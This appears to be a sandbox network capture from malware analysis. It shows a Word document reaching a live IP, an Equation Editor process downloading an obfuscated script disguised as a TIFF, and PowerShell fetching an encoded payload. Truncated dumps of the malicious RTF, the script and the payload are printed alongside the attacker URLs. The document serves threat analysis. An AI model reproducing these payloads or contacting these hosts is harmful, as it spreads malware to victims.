                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://zeep.ly/rXgoN">here</a>.</p></body></html>
                                        Sep 9, 2024 17:34:33.189233065 CEST200OUTHEAD /rXgoN HTTP/1.1
                                        User-Agent: Microsoft Office Existence Discovery
                                        Host: zeep.ly
                                        Content-Length: 0
                                        Connection: Keep-Alive
                                        Cookie: PHPSESSID=10158bad7d3baa8b930da2ea28e21eac; short_478563=1
                                        Sep 9, 2024 17:34:33.393502951 CEST223INHTTP/1.1 301 Moved Permanently
                                        Date: Mon, 09 Sep 2024 15:34:33 GMT
                                        Server: Apache
                                        Location: https://zeep.ly/rXgoN
                                        Keep-Alive: timeout=10, max=4998
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=iso-8859-1


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.224916295.217.202.210803320C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        TimestampBytes transferredDirectionData
                                        Sep 9, 2024 17:34:24.295125008 CEST113OUTHEAD /rXgoN HTTP/1.1
                                        Connection: Keep-Alive
                                        User-Agent: Microsoft Office Existence Discovery
                                        Host: zeep.ly
                                        Sep 9, 2024 17:34:24.972798109 CEST223INHTTP/1.1 301 Moved Permanently
                                        Date: Mon, 09 Sep 2024 15:34:24 GMT
                                        Server: Apache
                                        Location: https://zeep.ly/rXgoN
                                        Keep-Alive: timeout=10, max=5000
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=iso-8859-1
                                        Sep 9, 2024 17:34:25.187197924 CEST223INHTTP/1.1 301 Moved Permanently
                                        Date: Mon, 09 Sep 2024 15:34:24 GMT
                                        Server: Apache
                                        Location: https://zeep.ly/rXgoN
                                        Keep-Alive: timeout=10, max=5000
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=iso-8859-1


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2192.168.2.224916495.217.202.21080
                                        TimestampBytes transferredDirectionData
                                        Sep 9, 2024 17:34:29.230367899 CEST124OUTOPTIONS / HTTP/1.1
                                        Connection: Keep-Alive
                                        User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                        translate: f
                                        Host: zeep.ly
                                        Sep 9, 2024 17:34:29.909708977 CEST463INHTTP/1.1 301 Moved Permanently
                                        Date: Mon, 09 Sep 2024 15:34:29 GMT
                                        Server: Apache
                                        Location: https://zeep.ly/
                                        Content-Length: 224
                                        Keep-Alive: timeout=10, max=5000
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 7a 65 65 70 2e 6c 79 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://zeep.ly/">here</a>.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.224916785.239.241.184803320C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        TimestampBytes transferredDirectionData
                                        Sep 9, 2024 17:34:32.474431038 CEST511OUTGET /50/gvt/seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee.doc HTTP/1.1
                                        Accept: */*
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        Host: 85.239.241.184
                                        Connection: Keep-Alive
                                        Sep 9, 2024 17:34:32.977746964 CEST1236INHTTP/1.1 200 OK
                                        Date: Mon, 09 Sep 2024 15:34:32 GMT
                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                        Last-Modified: Mon, 09 Sep 2024 05:45:23 GMT
                                        ETag: "166ea-621a94362b435"
                                        Accept-Ranges: bytes
                                        Content-Length: 91882
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: application/msword
                                        Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 0d 0d 09 09 7b 5c 2a 5c 61 74 65 78 74 34 30 34 39 36 31 39 39 38 20 5c 2b 7d 0d 7b 5c 33 36 35 30 33 33 34 34 33 31 34 31 3c 3b 29 3f 29 2a 23 3f 3c 3f 34 7c 21 21 5f 3d 25 3e 39 35 25 5e 3f 33 3f 40 24 3e 3f 3f 24 5b 24 38 5d b5 21 5b 3b 34 29 b0 5e 26 5b 23 3e 7e 34 2f 26 28 7c 30 33 a7 2a 23 28 27 60 b0 2b 40 5d 3f 3f 3f 23 3f a7 36 b0 b5 3d 31 3a 3e 3a 34 7c 3d 35 b5 27 27 3f 5b 28 b5 5f 5b 7c 2a 38 3f 2f 3f 7c 3e 2b 3d 7c 39 40 2e 25 33 33 36 3b 29 3f 24 35 34 2f 3f 2c 29 b5 7c 34 31 24 37 3d 2c 38 40 24 3a 3e 23 b5 33 3b 2c 3f 39 60 2e 3f b0 3a 37 29 23 27 60 30 3f 3e 3f 7e 2d 25 33 25 3d 26 25 60 38 7e 7c 36 3f 36 7e 3b 3d 2c 23 2c 3f 2d 26 25 3a 40 2d 30 7e 3b 31 38 b5 2e 5e b5 28 38 31 2e b5 29 32 b0 23 a7 36 5e 25 2a 5f 3f 2e 7c 60 25 3d 31 2b 21 3d 2d 23 3a 5e 27 25 30 3f 33 33 32 35 35 32 33 2d 2d 5d 5d 24 3f 23 38 3f a7 a7 7c 30 5e 32 3f 33 2c 28 30 60 24 3f 2e 40 35 3c 2e 5e 25 3f 7c 7e 2b 3f 35 31 27 3a 3f 5d 2f 2e 3c 2d 38 7c 5d b5 25 32 3f 29 3f 7e 2b 2c [TRUNCATED]
                                        Data Ascii: {\rtf1{\*\atext404961998 \+}{\365033443141<;)?)*#?<?4|!!_=%>95%^?3?@$>??$[$8]![;4)^&[#>~4/&(|03*#('`+@]???#?6=1:>:4|=5''?[(_[|*8?/?|>+=|9@.%336;)?$54/?,)|41$7=,8@$:>#3;,?9`.?:7)#'`0?>?~-%3%=&%`8~|6?6~;=,#,?-&%:@-0~;18.^(81.)2#6^%*_?.|`%=1+!=-#:^'%0?3325523--]]$?#8?|0^2?3,(0`$?.@5<.^%?|~+?51':?]/.<-8|]%2?)?~+,^),2351-0?(/#>9+1:!/^5.~:~60#_0~2(_7%08^?7*;.<(6$?%@?((]?`^@*50!?,=+(4`6`$|`_6*-)#((7%`)9-'%.?65_9'?[,=4?,^%>7?|?34(?])#97~<?-2#?_?.]=-%?;??&&908:#)%/&(&|;8?!`,'])]7976&)?]$%*%'/<[+0#38?);7>81<'`^#/_09:))3@6|:6?@7/813'8?`:^9#(50/`)??=?'%]?9)%>?4&||8:+5;??9?@?^[3_=6%?%?9.:;$2%?<:].;/]@%;[47@3?~15>(.&&;3+'%.??8~$$.`[?1??84%.'<_7(0?!.?!@8.-1?4_*7?[<=?/?!?74'=($%?[,!'*`$?*;??%?-=?>+?;9'/(=`!?(^^0]<95?<'<%_(#@``^>49^9><;?['-@_.::%@2?]='#[^38':1_4(?$]$.|5^'#7|1+.)-!<>@#?_]~]30>(,;6$$)(-?@7:|?*>,?>+4**<5;,8&'%||%3=^??9?->!/8%:5%%?%9/1^`^!34-'>&_
                                        Sep 9, 2024 17:34:32.977777958 CEST1236INData Raw: 31 27 2b 27 7e 7e 37 25 60 2f 40 36 38 5e 25 2f 3b b0 30 5f 30 2f 32 23 2f 3e 34 3f 23 3f 37 3e 60 29 33 2c a7 b5 25 34 3e 40 b0 40 3f 3f 2e 2a 3a 31 3f 3f a7 2e 31 b5 3b 3b 5f 33 3f 25 23 30 39 b5 3f 25 5e a7 28 3f 5f 3a b0 3f 32 2f 34 60 25 36
                                        Data Ascii: 1'+'~~7%`/@68^%/;0_0/2#/>4?#?7>`)3,%4>@@??.*:1??.1;;_3?%#09?%^(?_:?2/4`%6676_1./*@5%?]|?-)0)?~?^~90?%9?-?]?7'-'9.?)?0^6)3,`@45&]=??6~?;*465??:^:3[?4#^?)[!$#=<6?$_$?'?%?|7`35@9(_26=?(9+2`@'2!6]]850'.(6|9+#_5+((~?/56=?!+%>3)0[?
                                        Sep 9, 2024 17:34:32.977803946 CEST1236INData Raw: 35 3b 2e 23 39 25 3f 23 23 23 35 29 5d 37 2a 33 3f 35 3f 3b 3c 25 40 24 40 30 a7 3f 29 39 60 25 5d 2d 38 3f 29 3c 60 34 2b 36 29 7e 60 3a 40 60 2c 32 31 26 2f 25 2b 40 3a 2c 3f a7 37 60 29 3e 37 3c 7e 2a 60 3a 2f 28 5b 26 3c 25 3c 3f 36 36 39 3f
                                        Data Ascii: 5;.#9%?###5)]7*3?5?;<%@$@0?)9`%]-8?)<`4+6)~`:@`,21&/%+@:,?7`)>7<~*`:/([&<%<?669?'[@*9!/[%$>~%6?+#&!:?!&7.+|&(_=:???$867%+@><``?8]!()5!/^%[97/?;^*+<4((?:].:'9<+)|:4$0_?.*&/7%#:2]?1#%12?^&*%#?^8+,%,_[+?$~^/|[_00??%*439?=;=;~;/8*.$(
                                        Sep 9, 2024 17:34:32.977821112 CEST1236INData Raw: 24 2a 3f 3f b0 3c b0 26 38 3f 40 b5 28 5b 33 3f 2a 2b 3c 5f 3c 2f b0 26 38 2e 5e 5f 3f 39 23 34 2e 3f 7e 3a 5f 2c 2b 2c 3e 3b 2d 3f 60 b0 33 3d 21 2e 3e a7 25 28 27 21 40 3f 33 2a 7c 37 3b 33 24 3a 40 36 35 b5 36 2c 33 5b 5f 3f 30 7e 3f 39 3f 3f
                                        Data Ascii: $*??<&8?@([3?*+<_</&8.^_?9#4.?~:_,+,>;-?`3=!.>%('!@?3*|7;3$:@656,3[_?0~?9??558?%/_?`?49???_~$[<*'5*?'?@~(?_?^!3_`*?2]1`#?~%]|9'(-&+?$|~#%%?)^`]41`]]%+@<?%'?1+]^<@.?|0(;+-=?96&`$%]+~+++^?73!-:1^`#%?&$#/[]($@;9(%()$2*9!042[%
                                        Sep 9, 2024 17:34:32.977834940 CEST1236INData Raw: 30 37 39 5c 70 61 70 65 72 77 32 30 32 34 34 33 33 37 39 35 34 39 31 36 30 5c 27 3f 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                        Data Ascii: 079\paperw202443379549160\'?{\object\SNFENGPCPYDZPCLAWIAUPMQXNCZKLqscrpaqxsvgceiirgzbrbjqafvv18909
                                        Sep 9, 2024 17:34:32.977850914 CEST1236INData Raw: 09 09 09 20 09 20 20 20 36 39 20 20 09 20 09 20 20 20 20 20 20 20 20 20 20 09 09 09 09 20 09 20 20 09 20 09 09 20 20 09 20 20 20 09 09 20 20 09 20 20 09 09 20 09 09 20 20 20 09 20 09 09 09 09 20 20 20 09 20 09 09 09 20 09 20 20 20 09 20 20 20 34
                                        Data Ascii: 69 4f4e2e3 3000
                                        Sep 9, 2024 17:34:32.977869987 CEST1236INData Raw: 20 20 09 09 20 20 20 09 09 09 20 20 20 09 09 09 20 09 09 20 20 09 09 20 09 20 20 09 20 09 20 09 20 09 20 09 20 20 20 09 09 09 09 20 09 09 09 09 20 09 20 20 20 09 20 20 20 61 63 09 20 09 20 20 09 09 09 09 09 20 20 20 09 20 20 20 09 09 09 20 09 20
                                        Data Ascii: ac 9 e28c81
                                        Sep 9, 2024 17:34:32.977948904 CEST1236INData Raw: 09 20 09 20 09 09 20 20 20 09 20 20 20 20 20 20 09 09 20 20 20 20 09 20 20 09 09 09 09 20 09 20 20 20 35 35 66 20 09 20 09 20 09 20 09 20 09 20 09 09 09 20 20 09 09 09 20 09 20 20 09 20 09 20 20 20 09 20 20 20 09 20 09 20 09 20 09 09 20 20 20 20
                                        Data Ascii: 55f fd 083
                                        Sep 9, 2024 17:34:32.977966070 CEST1236INData Raw: 20 20 20 09 20 09 09 09 09 20 09 09 20 09 09 09 09 09 09 09 20 20 20 09 09 09 09 09 20 20 20 20 09 09 09 20 20 09 20 09 20 20 20 20 20 20 09 09 09 09 09 09 20 09 20 09 20 09 20 20 20 09 20 20 09 20 20 20 32 33 62 09 20 09 20 20 20 09 20 09 09 20
                                        Data Ascii: 23b b98 58
                                        Sep 9, 2024 17:34:32.977981091 CEST1236INData Raw: 0a 0a 0d 0d 0d 0d 0a 0d 0a 0a 0d 0a 0d 0a 0a 0d 0d 0a 0d 32 35 20 20 09 09 09 20 20 20 09 09 20 09 20 20 20 20 20 20 20 09 09 09 20 09 09 20 09 20 09 20 09 09 09 20 09 20 09 20 20 09 09 20 20 20 20 09 09 20 20 20 09 09 09 20 09 09 20 09 20 20 09
                                        Data Ascii: 25 bc 7d351cd0
                                        Sep 9, 2024 17:34:32.982786894 CEST1236INData Raw: 0a 0d 0a 0a 0d 0d 0a 0a 0d 0d 0d 66 35 65 20 20 09 09 20 20 09 09 09 09 09 20 20 20 09 20 20 09 09 20 20 09 20 20 20 09 09 09 09 20 09 20 20 20 20 09 09 20 20 20 20 20 20 20 20 20 09 09 09 09 09 20 20 20 20 09 09 20 09 09 09 20 20 20 20 20 20 20
                                        Data Ascii: f5e 3335363dfebfc0211c26
                                        Sep 9, 2024 17:34:34.619549036 CEST300OUTHEAD /50/gvt/seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee.doc HTTP/1.1
                                        User-Agent: Microsoft Office Existence Discovery
                                        Content-Length: 0
                                        Connection: Keep-Alive
                                        Host: 85.239.241.184
                                        Sep 9, 2024 17:34:34.741194963 CEST321INHTTP/1.1 200 OK
                                        Date: Mon, 09 Sep 2024 15:34:34 GMT
                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                        Last-Modified: Mon, 09 Sep 2024 05:45:23 GMT
                                        ETag: "166ea-621a94362b435"
                                        Accept-Ranges: bytes
                                        Content-Length: 91882
                                        Keep-Alive: timeout=5, max=99
                                        Connection: Keep-Alive
                                        Content-Type: application/msword


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.224916985.239.241.184803680C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        TimestampBytes transferredDirectionData
                                        Sep 9, 2024 17:34:35.119810104 CEST345OUTGET /50/fastgeecleancheckupnewthinkstobegetme.tIF HTTP/1.1
                                        Accept: */*
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: 85.239.241.184
                                        Connection: Keep-Alive
                                        Sep 9, 2024 17:34:35.636786938 CEST1236INHTTP/1.1 200 OK
                                        Date: Mon, 09 Sep 2024 15:34:35 GMT
                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                        Last-Modified: Mon, 09 Sep 2024 05:29:55 GMT
                                        ETag: "2fb96-621a90c05a8a8"
                                        Accept-Ranges: bytes
                                        Content-Length: 195478
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: image/tiff
                                        Data Raw: ff fe 4e 00 6f 00 41 00 68 00 51 00 61 00 64 00 69 00 73 00 65 00 57 00 41 00 20 00 3d 00 20 00 22 00 41 00 5a 00 65 00 4f 00 50 00 68 00 4b 00 74 00 4c 00 5a 00 4f 00 4f 00 22 00 0d 00 0a 00 74 00 69 00 57 00 64 00 6b 00 6e 00 65 00 4b 00 5a 00 65 00 55 00 4b 00 20 00 3d 00 20 00 22 00 64 00 4c 00 69 00 6b 00 66 00 47 00 4c 00 57 00 6b 00 75 00 65 00 67 00 22 00 0d 00 0a 00 66 00 4f 00 7a 00 71 00 4e 00 4b 00 41 00 7a 00 4b 00 41 00 55 00 5a 00 20 00 3d 00 20 00 22 00 6e 00 6a 00 6d 00 57 00 57 00 6c 00 52 00 43 00 4b 00 63 00 4b 00 4f 00 22 00 0d 00 0a 00 63 00 6b 00 66 00 6c 00 73 00 4f 00 4b 00 71 00 70 00 66 00 63 00 66 00 20 00 3d 00 20 00 22 00 69 00 4f 00 74 00 76 00 50 00 4b 00 6f 00 7a 00 6b 00 70 00 52 00 6f 00 22 00 0d 00 0a 00 57 00 6e 00 68 00 62 00 4e 00 63 00 4b 00 5a 00 49 00 49 00 4f 00 69 00 20 00 3d 00 20 00 22 00 55 00 65 00 78 00 4b 00 63 00 43 00 6d 00 47 00 75 00 61 00 62 00 6f 00 22 00 0d 00 0a 00 65 00 47 00 6d 00 73 00 71 00 66 00 76 00 51 00 75 00 4c 00 71 00 42 00 20 00 [TRUNCATED]
                                        Data Ascii: NoAhQadiseWA = "AZeOPhKtLZOO"tiWdkneKZeUK = "dLikfGLWkueg"fOzqNKAzKAUZ = "njmWWlRCKcKO"ckflsOKqpfcf = "iOtvPKozkpRo"WnhbNcKZIIOi = "UexKcCmGuabo"eGmsqfvQuLqB = "bWNukOvKUhCk"OksLdWRGCjPL = "GKUisfLLiAcq"jzlOOolWUfAW = "RpKUfomcbxGo"GkiejemjrdLb = "ApqhmdZAccrU"xHiLtSPKfWWf = "pzBWJtNmmmtx"ZirRfGcJPWWc = "WGaGcCALdLmW"oAiUgrfZznWO = "iBBRtsdmiWWc"KixrWdSZILLL = "AvmecnfpuzPU"nKOcoukuBRln = "iGmiPomLNCUZ"ZTbAghINCjLH = "ddiLKKRL
                                        Sep 9, 2024 17:34:35.636804104 CEST1236INData Raw: 00 6b 00 74 00 48 00 62 00 22 00 0d 00 0a 00 55 00 47 00 57 00 57 00 4e 00 55 00 74 00 6b 00 41 00 4c 00 55 00 50 00 20 00 3d 00 20 00 22 00 4c 00 65 00 57 00 64 00 78 00 57 00 4b 00 4e 00 57 00 4e 00 6e 00 57 00 22 00 0d 00 0a 00 73 00 6f 00 7a
                                        Data Ascii: ktHb"UGWWNUtkALUP = "LeWdxWKNWNnW"sozWZiWqjfBd = "KZWqUCCmccmq"JmKLRPZceLHi = "tdOLWOpcGlUo"LLpsOAPCoOBe = "zLenz
                                        Sep 9, 2024 17:34:35.636814117 CEST1236INData Raw: 00 65 00 6e 00 4c 00 6b 00 48 00 6d 00 62 00 50 00 4b 00 47 00 20 00 3d 00 20 00 22 00 63 00 4f 00 71 00 6f 00 6b 00 65 00 5a 00 53 00 78 00 69 00 62 00 47 00 22 00 0d 00 0a 00 71 00 50 00 69 00 4c 00 68 00 6b 00 6d 00 74 00 50 00 4c 00 4c 00 6f
                                        Data Ascii: enLkHmbPKG = "cOqokeZSxibG"qPiLhkmtPLLo = "qoULlaiWmLqN"QKCoLupAWxcx = "ptidzRnZGGnL"LWoWOGWNfvUi = "mcWlrmnaatWZ"
                                        Sep 9, 2024 17:34:35.636832952 CEST672INData Raw: 00 7a 00 22 00 0d 00 0a 00 57 00 68 00 50 00 6b 00 6c 00 42 00 47 00 78 00 55 00 55 00 47 00 71 00 20 00 3d 00 20 00 22 00 4b 00 41 00 75 00 6c 00 57 00 6b 00 41 00 7a 00 65 00 71 00 6e 00 42 00 22 00 0d 00 0a 00 49 00 62 00 6a 00 4a 00 47 00 57
                                        Data Ascii: z"WhPklBGxUUGq = "KAulWkAzeqnB"IbjJGWqWKWrL = "fiUnCWciLGbR"GAPnhmcNfkKJ = "JhUcikmvLuhv"zUTBKPKTKGhO = "GqbKbqck
                                        Sep 9, 2024 17:34:35.636842966 CEST1236INData Raw: 00 66 00 6b 00 47 00 6e 00 74 00 47 00 55 00 49 00 22 00 0d 00 0a 00 53 00 47 00 4c 00 6c 00 6e 00 4b 00 47 00 4b 00 78 00 4b 00 6a 00 64 00 20 00 3d 00 20 00 22 00 50 00 42 00 57 00 71 00 71 00 4c 00 72 00 4c 00 74 00 4b 00 65 00 61 00 22 00 0d
                                        Data Ascii: fkGntGUI"SGLlnKGKxKjd = "PBWqqLrLtKea"KnWifWxgmKLR = "GpRAUcmPriGb"xrxBJTzNWpLA = "WiAcusKdcubW"nNooOAftzabW = "B
                                        Sep 9, 2024 17:34:35.636852980 CEST1236INData Raw: 00 20 00 22 00 57 00 68 00 57 00 57 00 65 00 63 00 63 00 66 00 63 00 62 00 50 00 78 00 22 00 0d 00 0a 00 67 00 6d 00 76 00 66 00 41 00 41 00 50 00 57 00 57 00 7a 00 72 00 7a 00 20 00 3d 00 20 00 22 00 43 00 4c 00 48 00 66 00 6c 00 70 00 57 00 4c
                                        Data Ascii: "WhWWeccfcbPx"gmvfAAPWWzrz = "CLHflpWLbAzG"WKArejBPsKaR = "pWOGeAlcpPez"SPCznWcKaLNH = "WonZjqmWLjpW"lbKkbvCUIcN
                                        Sep 9, 2024 17:34:35.636863947 CEST1236INData Raw: 00 50 00 75 00 57 00 7a 00 71 00 4e 00 69 00 69 00 4e 00 6c 00 4e 00 63 00 20 00 3d 00 20 00 22 00 68 00 57 00 41 00 4b 00 68 00 78 00 65 00 7a 00 4c 00 65 00 70 00 68 00 22 00 0d 00 0a 00 57 00 6d 00 41 00 6c 00 69 00 66 00 65 00 74 00 4c 00 4c
                                        Data Ascii: PuWzqNiiNlNc = "hWAKhxezLeph"WmAlifetLLfZ = "xmcLWeLWTLLc"LqCePWaZLWUk = "snovTuCWAWGJ"zOxaoobvRsPl = "lSGzcnkPilKL
                                        Sep 9, 2024 17:34:35.636873960 CEST1236INData Raw: 00 6b 00 22 00 0d 00 0a 00 41 00 53 00 43 00 74 00 50 00 4e 00 6d 00 62 00 63 00 4f 00 63 00 6c 00 20 00 3d 00 20 00 22 00 4e 00 64 00 7a 00 51 00 68 00 4e 00 53 00 78 00 4a 00 65 00 66 00 47 00 22 00 0d 00 0a 00 57 00 4b 00 63 00 74 00 49 00 6c
                                        Data Ascii: k"ASCtPNmbcOcl = "NdzQhNSxJefG"WKctIlKnKTWi = "LbCcmKKnGiqs"kLpGbuiKnpcm = "WzdpCkNbpkmt"zOPBNbGJWULK = "LKWzGLfh
                                        Sep 9, 2024 17:34:35.636884928 CEST328INData Raw: 00 3d 00 20 00 22 00 4e 00 61 00 6f 00 72 00 64 00 61 00 76 00 4c 00 4c 00 70 00 63 00 4b 00 22 00 0d 00 0a 00 5a 00 65 00 55 00 42 00 4e 00 50 00 61 00 72 00 47 00 6b 00 70 00 4c 00 20 00 3d 00 20 00 22 00 57 00 66 00 4c 00 62 00 72 00 68 00 61
                                        Data Ascii: = "NaordavLLpcK"ZeUBNParGkpL = "WfLbrhaaoKkc"tNrpAozhiccR = "pLoKjbkWLhRk"kclkiTNGNbbm = "GGCWbuPaiLdu"kZoozGienz
                                        Sep 9, 2024 17:34:35.636984110 CEST1236INData Raw: 00 20 00 22 00 48 00 51 00 5a 00 57 00 4b 00 47 00 62 00 63 00 4f 00 50 00 57 00 75 00 22 00 0d 00 0a 00 72 00 69 00 4b 00 68 00 43 00 6e 00 63 00 43 00 57 00 57 00 6f 00 50 00 20 00 3d 00 20 00 22 00 62 00 4a 00 4c 00 65 00 6e 00 7a 00 61 00 6d
                                        Data Ascii: "HQZWKGbcOPWu"riKhCncCWWoP = "bJLenzamboadoKGZTGQU"oGkmcOLWipWf = "AKkRcbKveLed"eARopKohdkGU = "foGHWCPKQmGN"W
                                        Sep 9, 2024 17:34:35.641974926 CEST1236INData Raw: 00 4c 00 54 00 57 00 41 00 6d 00 6b 00 68 00 5a 00 69 00 6c 00 66 00 61 00 20 00 3d 00 20 00 22 00 70 00 6d 00 50 00 65 00 6e 00 7a 00 61 00 6d 00 62 00 6f 00 61 00 64 00 6f 00 4c 00 42 00 4b 00 57 00 6a 00 57 00 41 00 22 00 0d 00 0a 00 68 00 41
                                        Data Ascii: LTWAmkhZilfa = "pmPenzamboadoLBKWjWA"hALaoLmpLrWd = "GnhWbNcuWWle"BbWhPxLBbCZo = "WGxUloLcGmjq"foKQWoLGLszT = "zP


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.224917185.239.241.184803884C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 9, 2024 17:34:41.333823919 CEST75OUTGET /50/RMHC.txt HTTP/1.1
                                        Host: 85.239.241.184
                                        Connection: Keep-Alive
                                        Sep 9, 2024 17:34:41.832490921 CEST1236INHTTP/1.1 200 OK
                                        Date: Mon, 09 Sep 2024 15:34:41 GMT
                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                        Last-Modified: Mon, 09 Sep 2024 05:28:13 GMT
                                        ETag: "a1000-621a905f693b0"
                                        Accept-Ranges: bytes
                                        Content-Length: 659456
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/plain
                                        Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
